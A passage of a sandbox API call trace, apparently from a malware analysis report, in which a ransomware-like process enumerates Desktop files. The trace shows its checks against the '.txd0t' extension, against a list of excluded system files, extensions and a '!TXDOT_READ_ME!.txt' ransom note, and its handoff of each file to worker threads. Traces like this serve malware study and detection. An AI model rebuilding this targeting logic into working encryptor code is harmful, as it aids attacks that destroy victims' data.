returned="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\VCbe_Sa0NEidgDcyfgFz.flv" [0073.859] SetEvent (hEvent=0x410) returned 1 [0073.859] FindNextFileW (in: hFindFile=0xec20f0, lpFindFileData=0x552f448 | out: lpFindFileData=0x552f448*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9c70bd0, ftCreationTime.dwHighDateTime=0x1d5ea5f, ftLastAccessTime.dwLowDateTime=0x2b6dbb40, ftLastAccessTime.dwHighDateTime=0x1d5f071, ftLastWriteTime.dwLowDateTime=0x2b6dbb40, ftLastWriteTime.dwHighDateTime=0x1d5f071, nFileSizeHigh=0x0, nFileSizeLow=0x37d5, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="Vn Oo.gif", cAlternateFileName="VNOO~1.GIF")) returned 1 [0073.860] StrCmpW (psz1="Vn Oo.gif", psz2=".") returned 1 [0073.860] StrCmpW (psz1="Vn Oo.gif", psz2="..") returned 1 [0073.860] StrCpyNW (in: psz1=0xed31f0, psz2="C:\\Users\\FD1HVy\\Desktop", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop") returned="C:\\Users\\FD1HVy\\Desktop" [0073.860] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop", psz2="\\", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\") returned="C:\\Users\\FD1HVy\\Desktop\\" [0073.860] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop\\", psz2="Vn Oo.gif", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\Vn Oo.gif") returned="C:\\Users\\FD1HVy\\Desktop\\Vn Oo.gif" [0073.860] PathFindExtensionW (pszPath="Vn Oo.gif") returned=".gif" [0073.860] StrCmpW (psz1=".gif", psz2=".txd0t") returned -1 [0073.860] StrCmpIW (psz1="Vn Oo.gif", psz2="bootsect.bak") returned 1 [0073.860] StrCmpIW (psz1="Vn Oo.gif", psz2="iconcache.db") returned 1 [0073.860] StrCmpIW (psz1="Vn Oo.gif", psz2="thumbs.db") returned 1 [0073.860] StrCmpIW (psz1="Vn Oo.gif", psz2=" ransomware ") returned 1 [0073.860] StrCmpIW (psz1="Vn Oo.gif", psz2=" ransom ") returned 1 [0073.860] StrCmpIW (psz1="Vn Oo.gif", psz2="debug.txt") returned 1 [0073.860] StrCmpIW (psz1="Vn Oo.gif", psz2="boot.ini") returned 1 [0073.860] StrCmpIW (psz1="Vn Oo.gif", psz2="desktop.ini") returned 1 [0073.860] StrCmpIW (psz1="Vn Oo.gif", psz2="autorun.inf") returned 1 [0073.860] StrCmpIW (psz1="Vn Oo.gif", psz2="ntuser.dat") returned 1 [0073.860] StrCmpIW (psz1="Vn Oo.gif", psz2="ntldr") returned 1 [0073.860] StrCmpIW (psz1="Vn Oo.gif", psz2="ntdetect.com") returned 1 [0073.860] StrCmpIW (psz1="Vn Oo.gif", psz2="bootfont.bin") returned 1 [0073.860] StrCmpIW (psz1="Vn Oo.gif", psz2="!TXDOT_READ_ME!.txt") returned 1 [0073.860] PathFindExtensionW (pszPath="Vn Oo.gif") returned=".gif" [0073.860] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".gif") returned 0x0 [0073.860] FileTimeToSystemTime (in: lpFileTime=0x552f44c, lpSystemTime=0x552f438 | out: lpSystemTime=0x552f438) returned 1 [0073.860] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f438, lpLocalTime=0x552f408 | out: lpLocalTime=0x552f408) returned 1 [0073.860] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x3 [0073.871] StrCpyW (in: psz1=0xeb7910, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0073.871] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\Users\\FD1HVy\\Desktop\\Vn Oo.gif", cchMax=32000 | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\Vn Oo.gif") returned="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\Vn Oo.gif" [0073.871] SetEvent (hEvent=0x418) returned 1 [0073.871] FindNextFileW (in: hFindFile=0xec20f0, lpFindFileData=0x552f448 | out: lpFindFileData=0x552f448*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcf874130, ftCreationTime.dwHighDateTime=0x1d5e4bc, ftLastAccessTime.dwLowDateTime=0xae3a4210, ftLastAccessTime.dwHighDateTime=0x1d5e940, ftLastWriteTime.dwLowDateTime=0xae3a4210, ftLastWriteTime.dwHighDateTime=0x1d5e940, nFileSizeHigh=0x0, nFileSizeLow=0x1698a, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="WDZdqCHFFcmh9_.mp3", cAlternateFileName="WDZDQC~1.MP3")) returned 1 [0073.871] StrCmpW (psz1="WDZdqCHFFcmh9_.mp3", psz2=".") returned 1 [0073.871] StrCmpW (psz1="WDZdqCHFFcmh9_.mp3", psz2="..") returned 1 [0073.871] StrCpyNW (in: psz1=0xed31f0, psz2="C:\\Users\\FD1HVy\\Desktop", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop") returned="C:\\Users\\FD1HVy\\Desktop" [0073.871] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop", psz2="\\", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\") returned="C:\\Users\\FD1HVy\\Desktop\\" [0073.871] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop\\", psz2="WDZdqCHFFcmh9_.mp3", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\WDZdqCHFFcmh9_.mp3") returned="C:\\Users\\FD1HVy\\Desktop\\WDZdqCHFFcmh9_.mp3" [0073.871] PathFindExtensionW (pszPath="WDZdqCHFFcmh9_.mp3") returned=".mp3" [0073.871] StrCmpW (psz1=".mp3", psz2=".txd0t") returned -1 [0073.871] StrCmpIW (psz1="WDZdqCHFFcmh9_.mp3", psz2="bootsect.bak") returned 1 [0073.871] StrCmpIW (psz1="WDZdqCHFFcmh9_.mp3", psz2="iconcache.db") returned 1 [0073.871] StrCmpIW (psz1="WDZdqCHFFcmh9_.mp3", psz2="thumbs.db") returned 1 [0073.872] StrCmpIW (psz1="WDZdqCHFFcmh9_.mp3", psz2=" ransomware ") returned 1 [0073.872] StrCmpIW (psz1="WDZdqCHFFcmh9_.mp3", psz2=" ransom ") returned 1 [0073.872] StrCmpIW (psz1="WDZdqCHFFcmh9_.mp3", psz2="debug.txt") returned 1 [0073.872] StrCmpIW (psz1="WDZdqCHFFcmh9_.mp3", psz2="boot.ini") returned 1 [0073.872] StrCmpIW (psz1="WDZdqCHFFcmh9_.mp3", psz2="desktop.ini") returned 1 [0073.872] StrCmpIW (psz1="WDZdqCHFFcmh9_.mp3", psz2="autorun.inf") returned 1 [0073.872] StrCmpIW (psz1="WDZdqCHFFcmh9_.mp3", psz2="ntuser.dat") returned 1 [0073.872] StrCmpIW (psz1="WDZdqCHFFcmh9_.mp3", psz2="ntldr") returned 1 [0073.872] StrCmpIW (psz1="WDZdqCHFFcmh9_.mp3", psz2="ntdetect.com") returned 1 [0073.872] StrCmpIW (psz1="WDZdqCHFFcmh9_.mp3", psz2="bootfont.bin") returned 1 [0073.872] StrCmpIW (psz1="WDZdqCHFFcmh9_.mp3", psz2="!TXDOT_READ_ME!.txt") returned 1 [0073.872] PathFindExtensionW (pszPath="WDZdqCHFFcmh9_.mp3") returned=".mp3" [0073.872] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".mp3") returned 0x0 [0073.872] FileTimeToSystemTime (in: lpFileTime=0x552f44c, lpSystemTime=0x552f438 | out: lpSystemTime=0x552f438) returned 1 [0073.872] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f438, lpLocalTime=0x552f408 | out: lpLocalTime=0x552f408) returned 1 [0073.872] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x2 [0073.877] StrCpyW (in: psz1=0xeafb88, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0073.877] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\Users\\FD1HVy\\Desktop\\WDZdqCHFFcmh9_.mp3", cchMax=32000 | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\WDZdqCHFFcmh9_.mp3") returned="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\WDZdqCHFFcmh9_.mp3" [0073.877] SetEvent (hEvent=0x410) returned 1 [0073.877] FindNextFileW (in: hFindFile=0xec20f0, lpFindFileData=0x552f448 | out: lpFindFileData=0x552f448*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xecb52350, ftCreationTime.dwHighDateTime=0x1d5ec3a, ftLastAccessTime.dwLowDateTime=0xf8088120, ftLastAccessTime.dwHighDateTime=0x1d5e8b1, ftLastWriteTime.dwLowDateTime=0xf8088120, ftLastWriteTime.dwHighDateTime=0x1d5e8b1, nFileSizeHigh=0x0, nFileSizeLow=0x17cb, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="wO3YP7g6H.wav", cAlternateFileName="WO3YP7~1.WAV")) returned 1 [0073.878] StrCmpW (psz1="wO3YP7g6H.wav", psz2=".") returned 1 [0073.878] StrCmpW (psz1="wO3YP7g6H.wav", psz2="..") returned 1 [0073.878] StrCpyNW (in: psz1=0xed31f0, psz2="C:\\Users\\FD1HVy\\Desktop", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop") returned="C:\\Users\\FD1HVy\\Desktop" [0073.878] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop", psz2="\\", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\") returned="C:\\Users\\FD1HVy\\Desktop\\" [0073.878] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop\\", psz2="wO3YP7g6H.wav", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\wO3YP7g6H.wav") returned="C:\\Users\\FD1HVy\\Desktop\\wO3YP7g6H.wav" [0073.878] PathFindExtensionW (pszPath="wO3YP7g6H.wav") returned=".wav" [0073.878] StrCmpW (psz1=".wav", psz2=".txd0t") returned 1 [0073.878] StrCmpIW (psz1="wO3YP7g6H.wav", psz2="bootsect.bak") returned 1 [0073.878] StrCmpIW (psz1="wO3YP7g6H.wav", psz2="iconcache.db") returned 1 [0073.878] StrCmpIW (psz1="wO3YP7g6H.wav", psz2="thumbs.db") returned 1 [0073.878] StrCmpIW (psz1="wO3YP7g6H.wav", psz2=" ransomware ") returned 1 [0073.878] StrCmpIW (psz1="wO3YP7g6H.wav", psz2=" ransom ") returned 1 [0073.878] StrCmpIW (psz1="wO3YP7g6H.wav", psz2="debug.txt") returned 1 [0073.878] StrCmpIW (psz1="wO3YP7g6H.wav", psz2="boot.ini") returned 1 [0073.878] StrCmpIW (psz1="wO3YP7g6H.wav", psz2="desktop.ini") returned 1 [0073.878] StrCmpIW (psz1="wO3YP7g6H.wav", psz2="autorun.inf") returned 1 [0073.878] StrCmpIW (psz1="wO3YP7g6H.wav", psz2="ntuser.dat") returned 1 [0073.878] StrCmpIW (psz1="wO3YP7g6H.wav", psz2="ntldr") returned 1 [0073.878] StrCmpIW (psz1="wO3YP7g6H.wav", psz2="ntdetect.com") returned 1 [0073.878] StrCmpIW (psz1="wO3YP7g6H.wav", psz2="bootfont.bin") returned 1 [0073.878] StrCmpIW (psz1="wO3YP7g6H.wav", psz2="!TXDOT_READ_ME!.txt") returned 1 [0073.878] PathFindExtensionW (pszPath="wO3YP7g6H.wav") returned=".wav" [0073.878] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".wav") returned 0x0 [0073.878] FileTimeToSystemTime (in: lpFileTime=0x552f44c, lpSystemTime=0x552f438 | out: lpSystemTime=0x552f438) returned 1 [0073.878] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f438, lpLocalTime=0x552f408 | out: lpLocalTime=0x552f408) returned 1 [0073.879] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x3 [0073.887] StrCpyW (in: psz1=0xeb7910, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0073.888] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\Users\\FD1HVy\\Desktop\\wO3YP7g6H.wav", cchMax=32000 | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\wO3YP7g6H.wav") returned="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\wO3YP7g6H.wav" [0073.888] SetEvent (hEvent=0x418) returned 1 [0073.888] FindNextFileW (in: hFindFile=0xec20f0, lpFindFileData=0x552f448 | out: lpFindFileData=0x552f448*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6bf8ae50, ftCreationTime.dwHighDateTime=0x1d5e184, ftLastAccessTime.dwLowDateTime=0xb2d1f1a0, ftLastAccessTime.dwHighDateTime=0x1d5e1f8, ftLastWriteTime.dwLowDateTime=0xb2d1f1a0, ftLastWriteTime.dwHighDateTime=0x1d5e1f8, nFileSizeHigh=0x0, nFileSizeLow=0xec63, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="yn-OCsN4T3Jmv.wav", cAlternateFileName="YN-OCS~1.WAV")) returned 1 [0073.888] StrCmpW (psz1="yn-OCsN4T3Jmv.wav", psz2=".") returned 1 [0073.888] StrCmpW (psz1="yn-OCsN4T3Jmv.wav", psz2="..") returned 1 [0073.888] StrCpyNW (in: psz1=0xed31f0, psz2="C:\\Users\\FD1HVy\\Desktop", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop") returned="C:\\Users\\FD1HVy\\Desktop" [0073.888] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop", psz2="\\", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\") returned="C:\\Users\\FD1HVy\\Desktop\\" [0073.888] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop\\", psz2="yn-OCsN4T3Jmv.wav", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\yn-OCsN4T3Jmv.wav") returned="C:\\Users\\FD1HVy\\Desktop\\yn-OCsN4T3Jmv.wav" [0073.888] PathFindExtensionW (pszPath="yn-OCsN4T3Jmv.wav") returned=".wav" [0073.888] StrCmpW (psz1=".wav", psz2=".txd0t") returned 1 [0073.888] StrCmpIW (psz1="yn-OCsN4T3Jmv.wav", psz2="bootsect.bak") returned 1 [0073.888] StrCmpIW (psz1="yn-OCsN4T3Jmv.wav", psz2="iconcache.db") returned 1 [0073.888] StrCmpIW (psz1="yn-OCsN4T3Jmv.wav", psz2="thumbs.db") returned 1 [0073.888] StrCmpIW (psz1="yn-OCsN4T3Jmv.wav", psz2=" ransomware ") returned 1 [0073.888] StrCmpIW (psz1="yn-OCsN4T3Jmv.wav", psz2=" ransom ") returned 1 [0073.888] StrCmpIW (psz1="yn-OCsN4T3Jmv.wav", psz2="debug.txt") returned 1 [0073.888] StrCmpIW (psz1="yn-OCsN4T3Jmv.wav", psz2="boot.ini") returned 1 [0073.888] StrCmpIW (psz1="yn-OCsN4T3Jmv.wav", psz2="desktop.ini") returned 1 [0073.888] StrCmpIW (psz1="yn-OCsN4T3Jmv.wav", psz2="autorun.inf") returned 1 [0073.888] StrCmpIW (psz1="yn-OCsN4T3Jmv.wav", psz2="ntuser.dat") returned 1 [0073.888] StrCmpIW (psz1="yn-OCsN4T3Jmv.wav", psz2="ntldr") returned 1 [0073.888] StrCmpIW (psz1="yn-OCsN4T3Jmv.wav", psz2="ntdetect.com") returned 1 [0073.888] StrCmpIW (psz1="yn-OCsN4T3Jmv.wav", psz2="bootfont.bin") returned 1 [0073.888] StrCmpIW (psz1="yn-OCsN4T3Jmv.wav", psz2="!TXDOT_READ_ME!.txt") returned 1 [0073.888] PathFindExtensionW (pszPath="yn-OCsN4T3Jmv.wav") returned=".wav" [0073.888] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".wav") returned 0x0 [0073.888] FileTimeToSystemTime (in: lpFileTime=0x552f44c, lpSystemTime=0x552f438 | out: lpSystemTime=0x552f438) returned 1 [0073.888] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f438, lpLocalTime=0x552f408 | out: lpLocalTime=0x552f408) returned 1 [0073.888] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x2 [0073.892] StrCpyW (in: psz1=0xeafb88, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0073.892] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\Users\\FD1HVy\\Desktop\\yn-OCsN4T3Jmv.wav", cchMax=32000 | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\yn-OCsN4T3Jmv.wav") returned="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\yn-OCsN4T3Jmv.wav" [0073.893] SetEvent (hEvent=0x410) returned 1 [0073.893] FindNextFileW (in: hFindFile=0xec20f0, lpFindFileData=0x552f448 | out: lpFindFileData=0x552f448*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x378b4220, ftCreationTime.dwHighDateTime=0x1d5ea0f, ftLastAccessTime.dwLowDateTime=0x50cd2da0, ftLastAccessTime.dwHighDateTime=0x1d5f088, ftLastWriteTime.dwLowDateTime=0x50cd2da0, ftLastWriteTime.dwHighDateTime=0x1d5f088, nFileSizeHigh=0x0, nFileSizeLow=0xbc34, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="Zau1_Q_6PWntC.gif", cAlternateFileName="ZAU1_Q~1.GIF")) returned 1 [0073.893] StrCmpW (psz1="Zau1_Q_6PWntC.gif", psz2=".") returned 1 [0073.893] StrCmpW (psz1="Zau1_Q_6PWntC.gif", psz2="..") returned 1 [0073.893] StrCpyNW (in: psz1=0xed31f0, psz2="C:\\Users\\FD1HVy\\Desktop", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop") returned="C:\\Users\\FD1HVy\\Desktop" [0073.893] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop", psz2="\\", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\") returned="C:\\Users\\FD1HVy\\Desktop\\" [0073.893] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop\\", psz2="Zau1_Q_6PWntC.gif", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\Zau1_Q_6PWntC.gif") returned="C:\\Users\\FD1HVy\\Desktop\\Zau1_Q_6PWntC.gif" [0073.893] PathFindExtensionW (pszPath="Zau1_Q_6PWntC.gif") returned=".gif" [0073.893] StrCmpW (psz1=".gif", psz2=".txd0t") returned -1 [0073.893] StrCmpIW (psz1="Zau1_Q_6PWntC.gif", psz2="bootsect.bak") returned 1 [0073.893] StrCmpIW (psz1="Zau1_Q_6PWntC.gif", psz2="iconcache.db") returned 1 [0073.893] StrCmpIW (psz1="Zau1_Q_6PWntC.gif", psz2="thumbs.db") returned 1 [0073.893] StrCmpIW (psz1="Zau1_Q_6PWntC.gif", psz2=" ransomware ") returned 1 [0073.893] StrCmpIW (psz1="Zau1_Q_6PWntC.gif", psz2=" ransom ") returned 1 [0073.893] StrCmpIW (psz1="Zau1_Q_6PWntC.gif", psz2="debug.txt") returned 1 [0073.893] StrCmpIW (psz1="Zau1_Q_6PWntC.gif", psz2="boot.ini") returned 1 [0073.893] StrCmpIW (psz1="Zau1_Q_6PWntC.gif", psz2="desktop.ini") returned 1 [0073.893] StrCmpIW (psz1="Zau1_Q_6PWntC.gif", psz2="autorun.inf") returned 1 [0073.893] StrCmpIW (psz1="Zau1_Q_6PWntC.gif", psz2="ntuser.dat") returned 1 [0073.893] StrCmpIW (psz1="Zau1_Q_6PWntC.gif", psz2="ntldr") returned 1 [0073.893] StrCmpIW (psz1="Zau1_Q_6PWntC.gif", psz2="ntdetect.com") returned 1 [0073.893] StrCmpIW (psz1="Zau1_Q_6PWntC.gif", psz2="bootfont.bin") returned 1 [0073.893] StrCmpIW (psz1="Zau1_Q_6PWntC.gif", psz2="!TXDOT_READ_ME!.txt") returned 1 [0073.893] PathFindExtensionW (pszPath="Zau1_Q_6PWntC.gif") returned=".gif" [0073.893] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".gif") returned 0x0 [0073.893] FileTimeToSystemTime (in: lpFileTime=0x552f44c, lpSystemTime=0x552f438 | out: lpSystemTime=0x552f438) returned 1 [0073.893] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f438, lpLocalTime=0x552f408 | out: lpLocalTime=0x552f408) returned 1 [0073.893] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x3 [0073.904] StrCpyW (in: psz1=0xeb7910, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0073.904] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\Users\\FD1HVy\\Desktop\\Zau1_Q_6PWntC.gif", cchMax=32000 | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\Zau1_Q_6PWntC.gif") returned="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\Zau1_Q_6PWntC.gif" [0073.904] SetEvent (hEvent=0x418) returned 1 [0073.904] FindNextFileW (in: hFindFile=0xec20f0, lpFindFileData=0x552f448 | out: lpFindFileData=0x552f448*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8a8b3a60, ftCreationTime.dwHighDateTime=0x1d5e9cf, ftLastAccessTime.dwLowDateTime=0xb6208b00, ftLastAccessTime.dwHighDateTime=0x1d5eaf9, ftLastWriteTime.dwLowDateTime=0xb6208b00, ftLastWriteTime.dwHighDateTime=0x1d5eaf9, nFileSizeHigh=0x0, nFileSizeLow=0x48e1, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="ZSfJsNS2sePMKa.pps", cAlternateFileName="ZSFJSN~1.PPS")) returned 1 [0073.904] StrCmpW (psz1="ZSfJsNS2sePMKa.pps", psz2=".") returned 1 [0073.904] StrCmpW (psz1="ZSfJsNS2sePMKa.pps", psz2="..") returned 1 [0073.904] StrCpyNW (in: psz1=0xed31f0, psz2="C:\\Users\\FD1HVy\\Desktop", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop") returned="C:\\Users\\FD1HVy\\Desktop" [0073.904] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop", psz2="\\", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\") returned="C:\\Users\\FD1HVy\\Desktop\\" [0073.904] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop\\", psz2="ZSfJsNS2sePMKa.pps", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\ZSfJsNS2sePMKa.pps") returned="C:\\Users\\FD1HVy\\Desktop\\ZSfJsNS2sePMKa.pps" [0073.904] PathFindExtensionW (pszPath="ZSfJsNS2sePMKa.pps") returned=".pps" [0073.904] StrCmpW (psz1=".pps", psz2=".txd0t") returned -1 [0073.904] StrCmpIW (psz1="ZSfJsNS2sePMKa.pps", psz2="bootsect.bak") returned 1 [0073.904] StrCmpIW (psz1="ZSfJsNS2sePMKa.pps", psz2="iconcache.db") returned 1 [0073.904] StrCmpIW (psz1="ZSfJsNS2sePMKa.pps", psz2="thumbs.db") returned 1 [0073.904] StrCmpIW (psz1="ZSfJsNS2sePMKa.pps", psz2=" ransomware ") returned 1 [0073.904] StrCmpIW (psz1="ZSfJsNS2sePMKa.pps", psz2=" ransom ") returned 1 [0073.904] StrCmpIW (psz1="ZSfJsNS2sePMKa.pps", psz2="debug.txt") returned 1 [0073.904] StrCmpIW (psz1="ZSfJsNS2sePMKa.pps", psz2="boot.ini") returned 1 [0073.904] StrCmpIW (psz1="ZSfJsNS2sePMKa.pps", psz2="desktop.ini") returned 1 [0073.904] StrCmpIW (psz1="ZSfJsNS2sePMKa.pps", psz2="autorun.inf") returned 1 [0073.905] StrCmpIW (psz1="ZSfJsNS2sePMKa.pps", psz2="ntuser.dat") returned 1 [0073.905] StrCmpIW (psz1="ZSfJsNS2sePMKa.pps", psz2="ntldr") returned 1 [0073.905] StrCmpIW (psz1="ZSfJsNS2sePMKa.pps", psz2="ntdetect.com") returned 1 [0073.905] StrCmpIW (psz1="ZSfJsNS2sePMKa.pps", psz2="bootfont.bin") returned 1 [0073.905] StrCmpIW (psz1="ZSfJsNS2sePMKa.pps", psz2="!TXDOT_READ_ME!.txt") returned 1 [0073.905] PathFindExtensionW (pszPath="ZSfJsNS2sePMKa.pps") returned=".pps" [0073.905] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".pps") returned 0x0 [0073.905] FileTimeToSystemTime (in: lpFileTime=0x552f44c, lpSystemTime=0x552f438 | out: lpSystemTime=0x552f438) returned 1 [0073.905] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f438, lpLocalTime=0x552f408 | out: lpLocalTime=0x552f408) returned 1 [0073.905] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x2 [0073.911] StrCpyW (in: psz1=0xeafb88, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0073.911] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\Users\\FD1HVy\\Desktop\\ZSfJsNS2sePMKa.pps", cchMax=32000 | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\ZSfJsNS2sePMKa.pps") returned="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\ZSfJsNS2sePMKa.pps" [0073.911] SetEvent (hEvent=0x410) returned 1 [0073.911] FindNextFileW (in: hFindFile=0xec20f0, lpFindFileData=0x552f448 | out: lpFindFileData=0x552f448*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa54e95c0, ftCreationTime.dwHighDateTime=0x1d5eb66, ftLastAccessTime.dwLowDateTime=0xad201040, ftLastAccessTime.dwHighDateTime=0x1d5e331, ftLastWriteTime.dwLowDateTime=0xad201040, ftLastWriteTime.dwHighDateTime=0x1d5e331, nFileSizeHigh=0x0, nFileSizeLow=0x8f2f, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="ztT1zUqOHSnYLoXvx2_E.csv", cAlternateFileName="ZTT1ZU~1.CSV")) returned 1 [0073.911] StrCmpW (psz1="ztT1zUqOHSnYLoXvx2_E.csv", psz2=".") returned 1 [0073.911] StrCmpW (psz1="ztT1zUqOHSnYLoXvx2_E.csv", psz2="..") returned 1 [0073.911] StrCpyNW (in: psz1=0xed31f0, psz2="C:\\Users\\FD1HVy\\Desktop", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop") returned="C:\\Users\\FD1HVy\\Desktop" [0073.911] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop", psz2="\\", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\") returned="C:\\Users\\FD1HVy\\Desktop\\" [0073.911] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop\\", psz2="ztT1zUqOHSnYLoXvx2_E.csv", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\ztT1zUqOHSnYLoXvx2_E.csv") 